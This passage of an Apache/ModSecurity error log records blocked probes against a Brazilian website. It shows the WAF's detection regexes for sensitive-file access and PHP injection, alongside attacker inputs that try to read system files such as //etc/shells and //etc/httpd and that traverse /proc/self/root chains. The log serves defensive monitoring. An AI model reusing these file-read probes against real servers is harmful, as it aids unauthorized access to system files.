"ab1Jz-oXxyEfFpUF8f-dtgAAAUI"]
[Fri Mar 20 10:21:19.415171 2026] [:error] [pid 31215:tid 140411674785536] [client 57.141.18.31:45034] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1JzwF0L0L-SsrnPo6GaQAAAsg"]
[Fri Mar 20 10:21:19.699345 2026] [:error] [pid 7235:tid 140411741927168] [client 216.73.216.191:45152] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt 3"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Jz_qxLDW4GITHUkQHEQAAAQA"]
[Fri Mar 20 10:21:19.730262 2026] [:error] [pid 9818:tid 140411741927168] [client 57.141.18.9:45156] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Jz11pVZ5mVmJwsFNNIAAAAEA"]
[Fri Mar 20 10:21:24.551513 2026] [:error] [pid 21219:tid 140411649607424] [client 216.73.216.191:45400] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1J1PXLqtnMIWvjpaK3ywAAAos"]
[Fri Mar 20 10:21:26.359403 2026] [:error] [pid 7893:tid 140411649607424] [client 216.73.216.191:45542] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt-6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1J1hCii7xarUs8iHaG1AAAAgs"]
[Fri Mar 20 10:21:41.377676 2026] [:error] [pid 9818:tid 140411716749056] [client 57.141.18.36:46240] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1J5V1pVZ5mVmJwsFNNNgAAAEM"]
[Fri Mar 20 10:21:41.775150 2026] [:error] [pid 7893:tid 140411540502272] [client 57.141.18.40:46262] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1J5RCii7xarUs8iHaG4AAAAhg"]
[Fri Mar 20 10:21:47.117431 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.243.128:40726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1J6fHIg5MgXLBnicMTrQAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:21:55.358012 2026] [:error] [pid 31215:tid 140411716749056] [client 57.141.18.75:46956] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1J8gF0L0L-SsrnPo6GgQAAAsM"]
[Fri Mar 20 10:21:55.815110 2026] [:error] [pid 26799:tid 140411616036608] [client 57.141.18.12:47016] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1J89a6ubjKNq_cu4b3GQAAA08"]
[Fri Mar 20 10:21:55.825825 2026] [:error] [pid 7893:tid 140411540502272] [client 57.141.18.77:47018] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1J8xCii7xarUs8iHaG7wAAAhg"]
[Fri Mar 20 10:22:00.842897 2026] [:error] [pid 21219:tid 140411741927168] [client 57.141.18.116:47278] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1J-PXLqtnMIWvjpaK36gAAAoA"]
[Fri Mar 20 10:22:04.082573 2026] [access_compat:error] [pid 11167:tid 140411683178240] [client 195.123.216.134:53526] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:22:07.868983 2026] [access_compat:error] [pid 7235:tid 140411708356352] [client 143.244.34.147:4852] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:22:10.346920 2026] [access_compat:error] [pid 26799:tid 140411607643904] [client 178.175.130.254:59189] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:22:11.695197 2026] [access_compat:error] [pid 10189:tid 140411658000128] [client 107.189.30.236:21506] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:22:14.927720 2026] [access_compat:error] [pid 9818:tid 140411649607424] [client 158.173.23.25:49811] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:22:18.240833 2026] [access_compat:error] [pid 21219:tid 140411540502272] [client 192.42.116.47:15297] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:22:21.726726 2026] [access_compat:error] [pid 7893:tid 140411616036608] [client 51.210.108.162:45095] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:22:22.132598 2026] [:error] [pid 7893:tid 140411607643904] [client 57.141.18.111:48468] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KDhCii7xarUs8iHaHGAAAAhA"]
[Fri Mar 20 10:22:22.915007 2026] [:error] [pid 15826:tid 140411590858496] [client 57.141.18.118:48526] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KDuoXxyEfFpUF8f-d_AAAAVI"]
[Fri Mar 20 10:22:24.373847 2026] [mime_magic:error] [pid 15826:tid 140411674785536] (70014)End of file found: [client 57.141.18.32:48624] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:22:27.113783 2026] [mime_magic:error] [pid 31215:tid 140411716749056] (70014)End of file found: [client 216.73.216.191:48814] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:22:33.455065 2026] [:error] [pid 21219:tid 140411590858496] [client 57.141.18.108:49252] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1KGfXLqtnMIWvjpaK4GgAAApI"]
[Fri Mar 20 10:22:36.793872 2026] [:error] [pid 11167:tid 140411582465792] [client 57.141.18.112:49488] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KHPHIg5MgXLBnicMUBAAAAdM"]
[Fri Mar 20 10:22:38.485780 2026] [access_compat:error] [pid 7893:tid 140411716749056] [client 188.241.177.204:10158] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:22:44.517793 2026] [mime_magic:error] [pid 21219:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:49932] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:22:44.855693 2026] [:error] [pid 7235:tid 140411691570944] [client 216.73.216.191:49760] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf)|gz(?:(?:encod|writ)e|compress|open|read)|scandir|read(?:(?:gz)?file|dir)|(?:proc_|bz)open|call_user_func))\\\\b" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_phpinjection.conf"] [line "9"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: readdir found within ARGS:fileloc: //lib64/glusterfs/6.0/xlator/performance/readdir-ahead.so"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1KJPqxLDW4GITHUkQHegAAAQY"]
[Fri Mar 20 10:22:50.802086 2026] [mime_magic:error] [pid 10189:tid 140411716749056] (70014)End of file found: [client 57.141.18.27:50230] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:22:52.129451 2026] [mime_magic:error] [pid 9818:tid 140411574073088] (70014)End of file found: [client 74.7.243.128:57360] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/lib/firmware
[Fri Mar 20 10:22:53.965796 2026] [mime_magic:error] [pid 15826:tid 140411741927168] (70014)End of file found: [client 57.141.18.82:50324] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:22:57.705873 2026] [:error] [pid 15826:tid 140411674785536] [client 57.141.18.0:50582] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1KMOoXxyEfFpUF8f-eMwAAAUg"]
[Fri Mar 20 10:22:59.141406 2026] [:error] [pid 31215:tid 140411582465792] [client 216.73.216.191:50702] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt-0"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1KMwF0L0L-SsrnPo6GywAAAtM"]
[Fri Mar 20 10:23:01.339406 2026] [:error] [pid 21219:tid 140411632822016] [client 57.141.18.94:50690] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KNPXLqtnMIWvjpaK4PAAAAo0"]
[Fri Mar 20 10:23:02.491440 2026] [:error] [pid 21219:tid 140411565680384] [client 57.141.18.42:50842] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KNvXLqtnMIWvjpaK4PgAAApU"]
[Fri Mar 20 10:23:26.998074 2026] [:error] [pid 26799:tid 140411632822016] [client 57.141.18.100:51714] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KTta6ubjKNq_cu4b3bQAAA00"]
[Fri Mar 20 10:23:27.278884 2026] [:error] [pid 11167:tid 140411548894976] [client 57.141.18.16:51648] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KT_HIg5MgXLBnicMUQQAAAdc"]
[Fri Mar 20 10:23:27.291118 2026] [:error] [pid 11167:tid 140411557287680] [client 57.141.18.67:51702] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KT_HIg5MgXLBnicMUQgAAAdY"]
[Fri Mar 20 10:23:28.431934 2026] [:error] [pid 11642:tid 140411548894976] [client 57.141.18.32:51806] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1KULninkcc-iUj5Ap7eQAAA5c"]
